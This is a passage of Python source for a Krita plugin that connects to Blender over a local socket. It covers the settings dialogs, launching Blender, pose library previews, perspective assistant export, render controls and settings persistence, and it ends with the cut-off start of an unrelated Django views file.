assistantsVBox.addWidget(axisCheckBox)\n assistantsGroupBox.setLayout(assistantsVBox)\n \n colorManagementGroupBox = QGroupBox(i18n(\"Color Management\"))\n\n overrideSRGBCheckBox = QCheckBox(i18n(\"Override layer color profile with 'sRGB-elle-V2-srgbtrc.icc'\"))\n overrideSRGBCheckBox.setChecked(self.settings.overrideSRGB)\n overrideSRGBCheckBox.setToolTip(i18n(\"When disabled the document's default color space will be used.\\nOnly disable if you know what you're doing.\\nSupport for different color depths is limited\"))\n overrideSRGBCheckBox.toggled.connect(lambda v: setattr(self.settings, 'overrideSRGB', v))\n\n colorMangeBlenderCheckBox = QCheckBox(i18n(\"Perform Blender's color management\"))\n colorMangeBlenderCheckBox.setChecked(self.settings.colorManageBlender)\n colorMangeBlenderCheckBox.setToolTip(i18n(\"Disable if you're using a linear gamma color space\"))\n colorMangeBlenderCheckBox.toggled.connect(lambda v: setattr(self.settings, 'colorManageBlender', v))\n\n convertBGRCheckBox = QCheckBox(i18n(\"Perform BGR to RGB conversion\"))\n convertBGRCheckBox.setChecked(self.settings.convertBGR)\n convertBGRCheckBox.setToolTip(i18n(\"Disable if R and B channels appear to be switched\"))\n convertBGRCheckBox.toggled.connect(lambda v: setattr(self.settings, 'convertBGR', v))\n\n colorManagementVBox = QVBoxLayout()\n colorManagementVBox.addWidget(overrideSRGBCheckBox)\n colorManagementVBox.addWidget(colorMangeBlenderCheckBox)\n colorManagementVBox.addWidget(convertBGRCheckBox)\n colorManagementGroupBox.setLayout(colorManagementVBox)\n \n dangerGroupBox = QGroupBox(i18n(\"Danger Zone (Use at your own risk)\"))\n\n backgroundDrawCheckBox = QCheckBox(i18n(\"Allow drawing while minimized\"))\n backgroundDrawCheckBox.setChecked(self.settings.backgroundDraw)\n backgroundDrawCheckBox.setToolTip(i18n(\"Will crash once in a while\"))\n backgroundDrawCheckBox.toggled.connect(lambda v: setattr(self.settings, 'backgroundDraw', v))\n \n lockFramesSpinBox = QSpinBox()\n lockFramesSpinBox.setRange(0, 120)\n lockFramesSpinBox.setSuffix(i18n(\" frames\"))\n lockFramesSpinBox.setValue(self.settings.lockFrames)\n lockFramesSpinBox.setToolTip(i18n(\"Hold krita's image lock for the specified number of frames\\nSetting this to 0 will disable locking resulting in crashes if the image is edited at the same time the frame is updated\"))\n lockFramesSpinBox.valueChanged.connect(lambda v: setattr(self.settings, 'lockFrames', v))\n\n dangerForm = QFormLayout()\n dangerForm.addRow(backgroundDrawCheckBox)\n dangerForm.addRow(i18n(\"Hold lock for: \"), lockFramesSpinBox)\n dangerGroupBox.setLayout(dangerForm)\n \n scrollContainer = QWidget()\n vbox = QVBoxLayout(scrollContainer)\n vbox.addLayout(form)\n vbox.addWidget(line)\n vbox.addWidget(libraryGroupBox)\n vbox.addWidget(connectionGroupBox)\n vbox.addWidget(assistantsGroupBox)\n vbox.addWidget(colorManagementGroupBox)\n vbox.addWidget(dangerGroupBox)\n vbox.addStretch(1)\n \n scroll = QScrollArea()\n scroll.setWidget(scrollContainer)\n scroll.setWidgetResizable(True)\n scroll.setHorizontalScrollBarPolicy(Qt.ScrollBarAlwaysOff)\n scroll.setFrameShape(QFrame.NoFrame)\n scroll.setFrameShadow(QFrame.Plain)\n scroll.setMinimumWidth(scrollContainer.minimumSizeHint().width() + scroll.verticalScrollBar().minimumSizeHint().width() + 22)\n\n dialogVbox = QVBoxLayout(dialog)\n dialogVbox.addWidget(scroll)\n dialogVbox.addWidget(buttonBox)\n dialog.show()\n dialog.activateWindow()\n if dialog.exec_() == QDialog.Accepted:\n lib = []\n for row in range(0, libraryTable.rowCount()):\n name = libraryTable.item(row, 0).text()\n file = libraryTable.item(row, 1).text()\n innerpath = libraryTable.item(row, 2).text()\n lib.append((name, file, innerpath))\n self.settings.library = lib\n self.writeSettings()\n else:\n self.readSettings()\n \n self.updateLibraryObjects()\n self.settingsButton.setEnabled(True)\n\n def setStatus(self, message):\n if message == self.lastStatus:\n self.statusRepeated = self.statusRepeated + 1\n message = f'{message} ({self.statusRepeated})'\n else:\n self.statusRepeated = 1\n self.lastStatus = message\n if self.server and self.server.running:\n self.statusBar.setText(\" \" + str(message))\n else:\n self.statusBar.setText(message) \n \n def determineBlenderPath(self, dialog = True):\n if not self.settings.blenderPath:\n try:\n import shutil\n p = shutil.which('blender')\n if p and os.path.isfile(p):\n self.settings.blenderPath = p\n \n elif os.path.isdir('C:\\Program Files\\Blender Foundation'):\n versions = sorted(os.listdir('C:\\Program Files\\Blender Foundation'), reverse=True)\n for ver in versions:\n p = os.path.join('C:\\Program Files\\Blender Foundation', ver, 'blender.exe')\n if os.path.isfile(p):\n self.settings.blenderPath = p\n break\n except e:\n print(e)\n \n if not self.settings.blenderPath:\n if dialog:\n dialog = QFileDialog(self, i18n(\"Open blender executable\"), QStandardPaths.writableLocation(QStandardPaths.ApplicationsLocation))\n if dialog.exec_() == QDialog.Accepted:\n self.settings.blenderPath = dialog.selectedUrls()[0].toLocalFile() \n self.writeSettings()\n else:\n self.writeSettings()\n \n \n def startBlender(self, ignored = False, file = ''): \n if not instance.activeDocument():\n return\n if self.blenderRunning:\n if file and self.server and self.server.running:\n self.server.sendMessage(('file', file))\n return\n \n self.determineBlenderPath() \n if self.settings.blenderPath:\n args = [self.settings.blenderPath, '--python', str(path.abspath(os.path.join(os.path.dirname(__file__), 'blenderLayerClient.py'))), '--', '--connect-to-krita', str(self.settings.host), str(self.settings.port)]\n \n if self.activeInFile == None:\n self.activeInFile = instance.activeDocument().fileName()\n \n if not file:\n file = self.getFilenameFromLayer() \n if file and os.path.isfile(file):\n args.insert(1, file)\n runnable = BlenderRunnable(args)\n runnable.signals.finished.connect(self.onBlenderStopped)\n \n self.blenderRunning = True\n self.startBlenderButton.setEnabled(False)\n self.startBlenderButton.setText(i18n(\"Blender running...\")) \n\n if (not self.server) or (not self.server.running):\n self.startStopServer()\n \n QThreadPool.globalInstance().start(runnable)\n \n def onBlenderStopped(self, result):\n if result:\n self.setStatus(result)\n self.blenderRunning = False\n self.startBlenderButton.setEnabled(True)\n self.startBlenderButton.setText(i18n(\"Start Blender\"))\n \n def startStopServer(self):\n if self.server and self.server.running:\n self.server.running = False\n self.startstop.setEnabled(False)\n self.startstop.setText(i18n(\"Stopping...\"))\n self.activeInFile = None\n self.activeDocument = None\n elif instance.activeDocument():\n self.server = BlenderLayerServer(self.settings)\n self.server.signals.finished.connect(self.onServerStopped)\n self.server.signals.connected.connect(self.onServerConnected)\n self.server.signals.error.connect(self.setStatus)\n self.server.signals.msgReceived.connect(self.handleMessage)\n self.activeDocument = instance.activeDocument()\n self.activeInFile = self.activeDocument.fileName()\n\n QThreadPool.globalInstance().start(self.server)\n self.startstop.setText(i18n(\"Stop Server\"))\n self.setStatus(i18n(\"Waiting for Blender...\"))\n\n def onServerStopped(self, result):\n self.onServerConnected(False, None)\n self.startstop.setEnabled(True)\n self.startstop.setText(i18n(\"Start Server\"))\n if result:\n self.setStatus(result)\n else:\n self.setStatus(i18n(\"Server stopped\"))\n if self.settings.region:\n self.saveRegionToLayer()\n \n def onServerConnected(self, connected, info):\n self.viewGroup.setEnabled(connected)\n self.libraryGroup.setEnabled(connected)\n self.setLayoutEnabled(self.updateButtonLayout, connected)\n self.setLayoutEnabled(self.renderButtonLayout, connected)\n if connected:\n self.startBlenderButton.setEnabled(False)\n self.startBlenderButton.setText(i18n(\"Connected\")) \n file = ''\n if info:\n transparancySupported = info[1]\n file = info[2]\n \n self.transparentCheck.setEnabled(transparancySupported)\n if not transparancySupported:\n self.transparentCheck.setChecked(False)\n if file:\n self.setStatus(i18n(\"Successfully connected\")+'
'+os.path.basename(file))\n self.saveFilenameToLayer(file)\n else:\n self.setStatus(i18n(\"Successfully connected\"))\n else:\n self.progress.hide()\n self.updatePoseLibrary([], True)\n self.startBlenderButton.setEnabled(not self.blenderRunning)\n self.startBlenderButton.setText(i18n(\"Blender running...\") if self.blenderRunning else i18n(\"Start Blender\"))\n self.setStatus(i18n(\"Waiting for Blender...\"))\n \n def handleMessage(self, msg):\n type = msg[0]\n if type == 'poselib':\n self.updatePoseLibrary(msg[1], msg[2])\n elif type == 'armatures':\n self.poseArmatures.clear()\n if len(msg[1]) == 0:\n self.poseArmatures.addItems([i18n(\"\")])\n else:\n self.poseArmatures.addItems(msg[1])\n elif type == 'posePreviews':\n for (name, pixels) in msg[1]:\n self.loadPosePreview(name, pixels)\n elif type == 'rotate':\n self.blockServerSignal = True\n self.navigate.setRotation(msg[1], msg[2])\n self.roll.setValue(msg[3] / math.pi * 180)\n self.blockServerSignal = False\n elif type == 'lens':\n self.blockServerSignal = True\n self.lens.setValue(msg[1])\n self.blockServerSignal = False\n elif type == 'ortho': \n self.blockServerSignal = True \n self.navigate.setOrtho(msg[1])\n self.blockServerSignal = False\n elif type == 'shading':\n self.blockServerSignal = True\n self.shading.setCurrentIndex(msg[1])\n self.blockServerSignal = False\n elif type == 'assistants': \n self.writeAssistants(msg)\n elif type == 'file':\n file = msg[1]\n self.setStatus(i18n(\"Successfully connected\")+ '
'+os.path.basename(file))\n self.saveFilenameToLayer(file)\n elif type == 'engine':\n self.updateCyclesWarning(msg[1], self.settings.shading)\n elif type == 'updateProgress':\n self.update.setCurrentIndex(2)\n self.setStatus(i18n(\"Updated animation frame\"))\n inProgress = msg[1] < msg[3]\n self.progress.setVisible(inProgress)\n self.setLayoutEnabled(self.renderButtonLayout, not inProgress)\n self.setLayoutEnabled(self.updateButtonLayout, not inProgress)\n self.progress.setRange(msg[2], msg[3])\n self.progress.setValue(msg[1])\n elif type == 'renderProgress':\n self.view.setCurrentIndex(2)\n self.update.setCurrentIndex(2)\n self.setStatus(i18n(\"Updated from render result\"))\n inProgress = msg[1] < msg[3]\n self.progress.setVisible(inProgress)\n self.setLayoutEnabled(self.renderButtonLayout, not inProgress)\n self.setLayoutEnabled(self.updateButtonLayout, not inProgress)\n self.progress.setRange(msg[2], msg[3])\n self.progress.setValue(msg[1])\n elif type == 'renderCancelled':\n self.setStatus(i18n(\"Rendering was cancelled\"))\n self.setLayoutEnabled(self.renderButtonLayout, True)\n self.setLayoutEnabled(self.updateButtonLayout, True)\n self.progress.hide()\n elif type == 'status':\n self.setStatus('[Blender] ' + i18n(msg[1]))\n else:\n print(\"Received unrecognized message type from Blender: \", type) \n \n def createAssistants(self):\n (fileName, mime) = QFileDialog.getSaveFileName(self, i18n(\"Save File\"), os.path.join(QStandardPaths.writableLocation(QStandardPaths.PicturesLocation), 'blenderlayer.paintingassistant'), i18n(\"Krita Assistant (*.paintingassistant)\"))\n if fileName:\n instance.action('KisAssistantTool').trigger()\n d = self.activeDocument if self.activeDocument else instance.activeDocument()\n self.server.sendMessage(('assistants', fileName, d.width() / d.xRes() * 72.0, d.height() / d.yRes() * 72.0))\n\n def writeAssistants(self, msg):\n fileName = msg[1]\n third = self.settings.assistantsThreePoint\n axis = self.settings.assistantsAxis\n\n handleLength = 5\n #vanishing points\n vxx = msg[2]\n vxy = msg[3]\n vxOrtho = msg[4]\n vyx = msg[5]\n vyy = msg[6]\n vyOrtho = msg[7]\n vzx = msg[8]\n vzy = msg[9] \n vzOrtho = msg[10]\n\n #center\n cx = msg[11]\n cy = msg[12] \n \n if vxOrtho:\n v2xx = cx - vxx * 100\n v2xy = cy - vxy * 100\n vxx = cx + vxx * 100\n vxy = cy + vxy * 100\n else:\n v2xx = cx + (cx - vxx) * 100\n v2xy = cy + (cy - vxy) * 100\n \n if vyOrtho:\n v2yx = cx - vyx * 100\n v2yy = cy - vyy * 100\n vyx = cx + vyx * 100\n vyy = cy + vyy * 100\n else:\n v2yx = cx + (cx - vyx) * 100\n v2yy = cy + (cy - vyy) * 100\n \n if vzOrtho:\n v2zx = cx - vzx * 100\n v2zy = cy - vzy * 100\n vzx = cx + vzx * 100\n vzy = cy + vzy * 100\n else:\n v2zx = cx + (cx - vzx) * 100\n v2zy = cy + (cy - vzy) * 100\n \n file = open(fileName,'w')\n file.write('')\n file.write(''.format(\n vxx, vxy, vyx, vyy, vzx, vzy,\n v2xx, v2xy, v2yx, v2yy, v2zx, v2zy,\n vxx - handleLength * 2, vxx - handleLength, vxx + handleLength, vxx + handleLength * 2,\n vyx - handleLength * 2, vyx - handleLength, vyx + handleLength, vyx + handleLength * 2,\n vzx - handleLength * 2, vzx - handleLength, vzx + handleLength, vzx + handleLength * 2))\n if not vxOrtho and not vyOrtho:\n file.write(''.format(1.0, 1 if not third else 0))\n else:\n if vxOrtho:\n file.write(''.format(1 if axis else 0))\n else:\n file.write(''.format(10.0))\n if vyOrtho:\n file.write(''.format(1 if axis else 0))\n else:\n file.write(''.format(10.0))\n if third:\n if vzOrtho:\n file.write(''.format(1 if axis else 0))\n else:\n file.write(''.format(10.0))\n if axis:\n if not vxOrtho:\n file.write('')\n if not vyOrtho:\n file.write('')\n if third and not vzOrtho:\n file.write('')\n \n file.write('')\n file.close()\n \n def updatePoseLibrary(self, items, clearPreviews):\n visible = len(items) > 0\n if not self.librarySeperator.isVisible() and visible:\n self.libraryForm.insertRow(1, self.librarySeperator)\n self.libraryForm.insertRow(2, self.poseArmaturesLabel, self.poseArmatures)\n elif self.librarySeperator.isVisible() and not visible:\n self.libraryForm.removeWidget(self.librarySeperator)\n self.libraryForm.removeWidget(self.poseArmatures)\n self.libraryForm.removeWidget(self.poseArmaturesLabel)\n self.librarySeperator.setVisible(visible)\n self.poseArmatures.setVisible(visible)\n self.poseArmaturesLabel.setVisible(visible)\n self.poseList.setVisible(visible)\n\n self.poseList.clear()\n self.settings.poseLib = items\n if clearPreviews:\n self.settings.posePreviews = {}\n if self.server and self.server.running and visible:\n self.server.sendMessage(('posePreviews', self.settings.poseLib[:10]))\n for name in items:\n pixels = self.settings.posePreviews.get(name)\n widget = QWidget()\n layout = QVBoxLayout()\n layout.setContentsMargins(0, 0, 0, 11)\n image = QLabel()\n image.setAlignment(Qt.AlignCenter)\n if pixels:\n image.setPixmap(QPixmap.fromImage(QImage(pixels, 128, 128, QImage.Format_RGBA8888)))\n image.setMinimumWidth(128)\n else:\n icon = instance.icon('folder-pictures')\n image.setPixmap(icon.pixmap(icon.actualSize(QSize(64, 64))))\n image.setMinimumWidth(128)\n text = QLabel(name)\n text.setAlignment(Qt.AlignCenter)\n layout.addStretch()\n layout.addWidget(image)\n layout.addStretch()\n layout.addWidget(text)\n #layout.setSizeConstraint(QLayout.SetFixedSize)\n widget.setLayout(layout)\n item = QListWidgetItem()\n item.setSizeHint(widget.sizeHint()) \n self.poseList.addItem(item)\n self.poseList.setItemWidget(item, widget)\n \n def loadPosePreview(self, name, pixels):\n if pixels:\n self.settings.posePreviews[name] = pixels\n try:\n i = self.settings.poseLib.index(name)\n widget = self.poseList.itemWidget(self.poseList.item(i)).layout().itemAt(1).widget()\n widget.setPixmap(QPixmap.fromImage(QImage(pixels, 128, 128, QImage.Format_RGBA8888))) \n except ValueError as e:\n print(e)\n \n def requestPosePreviews(self, scroll):\n item = self.poseList.itemAt(100, 100)\n i = self.poseList.row(item)\n if i >= 0 and i < len(self.settings.poseLib):\n action = self.settings.poseLib[i]\n if self.settings.posePreviews.get(action) == None:\n self.server.sendMessage(('posePreviews', [action]))\n self.settings.posePreviews[action] = False\n \n item = self.poseList.itemAt(self.poseList.width() - 100, 100)\n i = self.poseList.row(item)\n if i >= 0 and i < len(self.settings.poseLib):\n action = self.settings.poseLib[i]\n if self.settings.posePreviews.get(action) == None:\n self.server.sendMessage(('posePreviews', [action]))\n self.settings.posePreviews[action] = False\n \n def applyPose(self, item, flipped = False):\n i = self.poseList.row(item)\n if i >= 0 and i < len(self.settings.poseLib):\n action = self.settings.poseLib[i]\n self.server.sendMessage(('pose', str(self.poseArmatures.currentText()), action, flipped))\n \n def updateLibraryObjects(self):\n if not self.libraryObject:\n return\n\n self.libraryObject.clear()\n items = [name for (name, file, innerpath) in self.settings.library]\n if len(items) == 0:\n self.libraryObject.addItems([i18n(\"\")])\n self.libraryAppend.setEnabled(False)\n else:\n self.libraryObject.addItems(items)\n self.libraryAppend.setEnabled(True)\n\n def appendFromLibrary(self):\n i = self.libraryObject.currentIndex()\n name, file, innerpath = self.settings.library[i]\n if not os.path.isfile(file):\n abs = path.abspath(os.path.join(os.path.dirname(__file__), file))\n if os.path.isfile(abs):\n file = str(abs)\n self.server.sendMessage(('append', name, file, innerpath))\n \n def render(self):\n if not self.isLayoutEnabled(self.renderButtonLayout):\n return\n \n self.progress.setRange(0, 0)\n self.progress.show()\n self.setLayoutEnabled(self.renderButtonLayout, False)\n self.setLayoutEnabled(self.updateButtonLayout, False)\n self.server.sendMessage(('render', self.renderOverride.isChecked(), self.renderTemporary.isChecked(), self.renderOverridePath.isChecked(), self.settings.renderPath, self.renderOverrideRes.isChecked(), self.renderTransparency.isChecked()))\n \n def updateFrame(self):\n if not self.isLayoutEnabled(self.updateButtonLayout):\n return\n self.server.sendMessage(('requestFrame', True))\n \n def updateAnimation(self, render = False):\n if not self.isLayoutEnabled(self.renderButtonLayout if render else self.updateButtonLayout):\n return\n d = self.activeDocument if self.activeDocument else instance.activeDocument()\n \n dialog = QDialog(Application.activeWindow().qwindow())\n dialog.setWindowTitle(i18n(\"Render Animation\") if render else i18n(\"Update Animation\"))\n buttonBox = QDialogButtonBox()\n buttonBox.setOrientation(QtCore.Qt.Horizontal)\n buttonBox.setStandardButtons(QDialogButtonBox.Ok | QDialogButtonBox.Cancel)\n buttonBox.accepted.connect(dialog.accept)\n buttonBox.rejected.connect(dialog.reject)\n \n overrideGroupBox = QGroupBox(i18n(\"Override Blender's settings\"))\n overrideGroupBox.setToolTip(i18n(\"Override Blender's timeline settings\"))\n overrideGroupBox.setCheckable(True)\n\n frameRateSpinBox = QSpinBox()\n frameRateSpinBox.setRange(0, 120)\n frameRateSpinBox.setValue(d.framesPerSecond())\n frameRateSpinBox.setSuffix(i18n(\" fps\"))\n \n clipStartSpinBox = QSpinBox()\n clipStartSpinBox.setRange(0, 10000)\n clipStartSpinBox.setValue(d.fullClipRangeStartTime())\n \n clipEndSpinBox = QSpinBox()\n clipEndSpinBox.setRange(0, 10000)\n clipEndSpinBox.setValue(d.fullClipRangeEndTime())\n \n stepSpinBox = QSpinBox()\n stepSpinBox.setRange(0, 10000)\n stepSpinBox.setValue(1)\n\n temporaryCheck = QCheckBox(i18n(\"Only apply temporarily\"))\n temporaryCheck.setToolTip(i18n(\"Settings will be reverted once the animation is done\"))\n temporaryCheck.setChecked(True)\n\n overrideForm = QFormLayout()\n overrideForm.addRow(i18n(\"Clip Start:\"), clipStartSpinBox)\n overrideForm.addRow(i18n(\"Clip End:\"), clipEndSpinBox)\n overrideForm.addRow(i18n(\"Step:\"), stepSpinBox)\n overrideForm.addRow(i18n(\"Framerate:\"), frameRateSpinBox)\n overrideForm.addRow(temporaryCheck)\n overrideGroupBox.setLayout(overrideForm)\n \n overrideKritaCheck = QCheckBox(i18n(\"Adjust Krita's settings to match Blender's\"))\n overrideKritaCheck.setToolTip(i18n(\"Krita's clip settings will be set to Blender's timeline settings\"))\n overrideKritaCheck.setChecked(True)\n\n vbox = QVBoxLayout(dialog)\n vbox.addWidget(overrideGroupBox)\n vbox.addWidget(overrideKritaCheck)\n vbox.addStretch(1)\n vbox.addWidget(buttonBox)\n vbox.setSizeConstraint(QLayout.SetFixedSize)\n dialog.show()\n dialog.activateWindow()\n if dialog.exec_() == QDialog.Accepted:\n self.update.setCurrentIndex(2)\n if render:\n self.server.sendMessage(('renderAnimation', self.renderOverride.isChecked(), self.renderTemporary.isChecked(), self.renderOverridePath.isChecked(), self.settings.renderPath, self.renderOverrideRes.isChecked(), self.renderTransparency.isChecked(),\n overrideGroupBox.isChecked(), temporaryCheck.isChecked(), overrideKritaCheck.isChecked(), frameRateSpinBox.value(), clipStartSpinBox.value(), clipEndSpinBox.value(), stepSpinBox.value()))\n else: \n self.server.sendMessage(('requestAnimation', overrideGroupBox.isChecked(), temporaryCheck.isChecked(), overrideKritaCheck.isChecked(), frameRateSpinBox.value(), clipStartSpinBox.value(), clipEndSpinBox.value(), stepSpinBox.value()))\n self.progress.setRange(0, 0)\n self.progress.show()\n self.setLayoutEnabled(self.renderButtonLayout, False)\n self.setLayoutEnabled(self.updateButtonLayout, False)\n \n def saveFilenameToLayer(self, fileName, overwrite = True):\n d = self.activeDocument if self.activeDocument else instance.activeDocument()\n if not d or not d.rootNode():\n return\n l = d.nodeByName(self.settings.layerName)\n if l == None or l == 0:\n l = d.createNode(self.settings.layerName, 'paintLayer')\n d.rootNode().addChildNode(l, None)\n\n name = fileName\n if name and self.settings.relPath and self.activeInFile:\n name = os.path.relpath(name, os.path.dirname(self.activeInFile))\n \n if len(l.childNodes()) == 0:\n l2 = d.createSelectionMask(name)\n s = Selection()\n s.select(0, 0, d.width(), d.height(), 255)\n l2.setSelection(s)\n l.addChildNode(l2, None)\n elif overwrite:\n l2 = l.childNodes()[0].setName(name)\n \n def getFilenameFromLayer(self): \n d = self.activeDocument if self.activeDocument else instance.activeDocument()\n l = d.nodeByName(self.settings.layerName)\n if l and l != 0 and len(l.childNodes()) > 0: \n name = l.childNodes()[0].name()\n if self.settings.relPath and self.activeInFile:\n rel = os.path.join(os.path.dirname(self.activeInFile), name)\n if os.path.os.path.isfile(rel):\n name = rel\n return name\n return ''\n \n def resetRegion(self, b):\n self.settings.region = b\n d = self.activeDocument if self.activeDocument else instance.activeDocument()\n w = d.width()\n h = d.height()\n\n self.regionX.setRange(-w, w)\n self.regionY.setRange(-h, h)\n self.regionWidth.setRange(1, w)\n self.regionHeight.setRange(1, h)\n \n if b:\n self.getRegionFromLayer()\n else:\n self.saveRegionToLayer()\n self.regionX.setValue(0)\n self.regionY.setValue(0)\n self.regionWidth.setValue(w)\n self.regionHeight.setValue(h)\n \n self.regionChanged()\n\n def regionFromSelection(self):\n select = instance.activeDocument().selection()\n d = self.activeDocument if self.activeDocument else instance.activeDocument()\n if select:\n self.regionX.setValue(select.x())\n self.regionY.setValue(select.y())\n self.regionWidth.setValue(select.width())\n self.regionHeight.setValue(select.height())\n else:\n self.regionX.setValue(0)\n self.regionY.setValue(0)\n self.regionWidth.setValue(d.width())\n self.regionHeight.setValue(d.height())\n\n def saveRegionToLayer(self):\n d = self.activeDocument if self.activeDocument else instance.activeDocument()\n if not d or not d.rootNode():\n return\n x = self.regionX.value()\n y = self.regionY.value()\n w = self.regionWidth.value()\n h = self.regionHeight.value()\n v = self.regionViewport.isChecked()\n if x != 0 or y != 0 or w != d.width() or h != d.height() or not v:\n self.saveFilenameToLayer('', False) \n l = d.nodeByName(self.settings.layerName)\n if l != None and l != 0 and len(l.childNodes()) > 0 and l.childNodes()[0].type() == 'selectionmask':\n s = Selection()\n s.select(x, y, w, h, 255 if v else 127)\n l.childNodes()[0].setSelection(s)\n \n def getRegionFromLayer(self):\n d = self.activeDocument if self.activeDocument else instance.activeDocument()\n l = d.nodeByName(self.settings.layerName)\n if l != None and l != 0 and len(l.childNodes()) > 0 and l.childNodes()[0].type() == 'selectionmask':\n select = l.childNodes()[0].selection()\n if select:\n self.regionX.setValue(select.x())\n self.regionY.setValue(select.y())\n self.regionWidth.setValue(select.width())\n self.regionHeight.setValue(select.height())\n self.regionViewport.setChecked(select.pixelData(select.x(), select.y(), 1, 1)[0] != b'\\x7f')\n else:\n self.regionX.setValue(0)\n self.regionY.setValue(0)\n self.regionWidth.setValue(d.width())\n self.regionHeight.setValue(d.height())\n else:\n self.regionX.setValue(0)\n self.regionY.setValue(0)\n self.regionWidth.setValue(d.width())\n self.regionHeight.setValue(d.height())\n \n def regionChanged(self, v = 0):\n self.settings.regionX = self.regionX.value()\n self.settings.regionY = self.regionY.value()\n self.settings.regionWidth = self.regionWidth.value()\n self.settings.regionHeight = self.regionHeight.value()\n self.settings.regionViewport = self.regionViewport.isChecked()\n if self.server and self.server.running:\n self.server.sendMessage(('region', self.settings.regionX, self.settings.regionY, self.settings.regionWidth, self.settings.regionHeight, self.settings.regionViewport))\n \n def updateCyclesWarning(self, engine, shading):\n self.settings.engine = engine\n self.settings.shading = shading\n self.cyclesWarning.setVisible(engine == 'CYCLES' and shading == 3) \n\n def viewModeChanged(self, index, fromClient = False):\n self.settings.viewMode = index\n if self.server and self.server.running and not fromClient:\n self.server.sendMessage(('viewMode', index))\n self.setLayoutVisible(self.updateLayout, index < 2)\n self.viewGroup.setVisible(index < 2)\n self.updateGroup.setVisible(index < 2)\n self.libraryGroup.setVisible(index < 2)\n self.renderGroup.setVisible(index == 2)\n self.setLayoutVisible(self.currentViewLayout, index == 0)\n \n def updateModeChanged(self, index, fromClient = False):\n self.settings.updateMode = index\n if self.server and self.server.running and not fromClient:\n self.server.sendMessage(('updateMode', index))\n if self.updateRate.isVisible() and index != 0:\n self.updateForm.removeWidget(self.updateRate)\n self.updateForm.removeWidget(self.updateRateLabel)\n elif not self.updateRate.isVisible() and index == 0:\n self.updateForm.insertRow(0, self.updateRateLabel, self.updateRate)\n self.updateRate.setVisible(index == 0)\n self.updateRateLabel.setVisible(index == 0)\n self.updateSeperator.setVisible(index != 0)\n self.manualWarning.setVisible(index == 2)\n self.setLayoutVisible(self.updateButtonLayout, index != 0)\n \n def setLayoutVisible(self, layout, visible):\n for i in range(layout.count()): \n item = layout.itemAt(i)\n if item.layout():\n self.setLayoutVisible(item.layout(), visible)\n elif item.widget():\n item.widget().setVisible(visible)\n \n def setLayoutEnabled(self, layout, enabled):\n for i in range(layout.count()): \n item = layout.itemAt(i)\n if item.layout():\n self.setLayoutEnabled(item.layout(), enabled)\n elif item.widget():\n item.widget().setEnabled(enabled) \n \n def isLayoutEnabled(self, layout):\n if layout.count() == 0:\n return False\n elif layout.itemAt(0).widget():\n return layout.itemAt(0).widget().isEnabled()\n else:\n return self.isLayoutEnabled(layout.itemAt(0).layout())\n \n def readSettings(self): \n self.settings.blenderPath = instance.readSetting('blender_layer', 'blenderPath', '')\n self.settings.renderPath = instance.readSetting('blender_layer', 'renderPath', '/tmp/BlenderLayer')\n self.settings.layerName = instance.readSetting('blender_layer', 'layerName', 'Blender Layer')\n self.settings.relPath = instance.readSetting('blender_layer', 'relPath', 'True') == 'True'\n self.settings.navigateAlt = instance.readSetting('blender_layer', 'navigateAlt', 'True') == 'True'\n\n libraryStr = instance.readSetting('blender_layer', 'library', 'Body-chan\\\\\\\\library/bodychan-bodykun.blend\\\\\\\\Collection/BodyChan;Action/Standing;Action/Jumping////Body-kun\\\\\\\\library/bodychan-bodykun.blend\\\\\\\\Collection/BodyKun;Action/Standing////Monkey\\\\\\\\library/default.blend\\\\\\\\Object/Suzanne////Cube\\\\\\\\library/default.blend\\\\\\\\Object/Cube')\n \n self.settings.host = instance.readSetting('blender_layer', 'host', '127.0.0.1')\n portStr = instance.readSetting('blender_layer', 'port', '')\n self.settings.sharedMem = instance.readSetting('blender_layer', 'sharedMem', 'True') == 'True'\n\n self.settings.assistantsThreePoint = instance.readSetting('blender_layer', 'assistantsThreePoint', 'True') == 'True'\n self.settings.assistantsAxis = instance.readSetting('blender_layer', 'assistantsAxis', 'True') == 'True'\n \n self.settings.overrideSRGB = instance.readSetting('blender_layer', 'overrideSRGB', 'True') == 'True'\n self.settings.colorManageBlender = instance.readSetting('blender_layer', 'colorManageBlender', 'True') == 'True'\n self.settings.convertBGR = instance.readSetting('blender_layer', 'convertBGR', 'True') == 'True'\n \n self.settings.backgroundDraw = instance.readSetting('blender_layer', 'backgroundDraw', 'False') == 'True'\n lockFramesStr = instance.readSetting('blender_layer', 'lockFrames', '')\n\n try:\n self.settings.port = int(portStr)\n except ValueError:\n self.settings.port = 65432\n \n try:\n lib = []\n for e in libraryStr.split('////'):\n s = e.split('\\\\\\\\')\n lib.append((s[0], s[1], s[2]))\n self.settings.library = lib\n except IndexError:\n self.settings.library = []\n\n try:\n self.settings.lockFrames = int(lockFramesStr)\n except ValueError:\n self.settings.lockFrames = 10\n \n def writeSettings(self):\n instance.writeSetting('blender_layer', 'blenderPath', self.settings.blenderPath)\n instance.writeSetting('blender_layer', 'renderPath', self.settings.renderPath)\n instance.writeSetting('blender_layer', 'layerName', self.settings.layerName)\n instance.writeSetting('blender_layer', 'relPath', str(self.settings.relPath))\n instance.writeSetting('blender_layer', 'navigateAlt', str(self.settings.navigateAlt))\n instance.writeSetting('blender_layer', 'library', '////'.join([name + '\\\\\\\\' + file + '\\\\\\\\' + innerpath for (name, file, innerpath) in self.settings.library]))\n instance.writeSetting('blender_layer', 'host', self.settings.host)\n instance.writeSetting('blender_layer', 'port', str(self.settings.port))\n instance.writeSetting('blender_layer', 'sharedMem', str(self.settings.sharedMem))\n instance.writeSetting('blender_layer', 'assistantsThreePoint', str(self.settings.assistantsThreePoint))\n instance.writeSetting('blender_layer', 'assistantsAxis', str(self.settings.assistantsAxis))\n instance.writeSetting('blender_layer', 'overrideSRGB', str(self.settings.overrideSRGB))\n instance.writeSetting('blender_layer', 'colorManageBlender', str(self.settings.colorManageBlender))\n instance.writeSetting('blender_layer', 'convertBGR', str(self.settings.convertBGR))\n instance.writeSetting('blender_layer', 'backgroundDraw', str(self.settings.backgroundDraw))\n instance.writeSetting('blender_layer', 'lockFrames', str(self.settings.lockFrames))","repo_name":"Yuntokon/BlenderLayer","sub_path":"blender_layer/blenderLayer.py","file_name":"blenderLayer.py","file_ext":"py","file_size_in_byte":76256,"program_lang":"python","lang":"en","doc_type":"code","stars":77,"dataset":"github-code","pt":"82"} +{"seq_id":"8616268476","text":"from django.shortcuts import render, redirect, get_object_or_404\nfrom django.contrib import messages\nfrom django.contrib.auth.decorators import login_required\nfrom django.core.paginator import Paginator\nfrom django.db.models import Count, Q\nfrom ..models import Hackathon, Sponsorship, Lead\nfrom 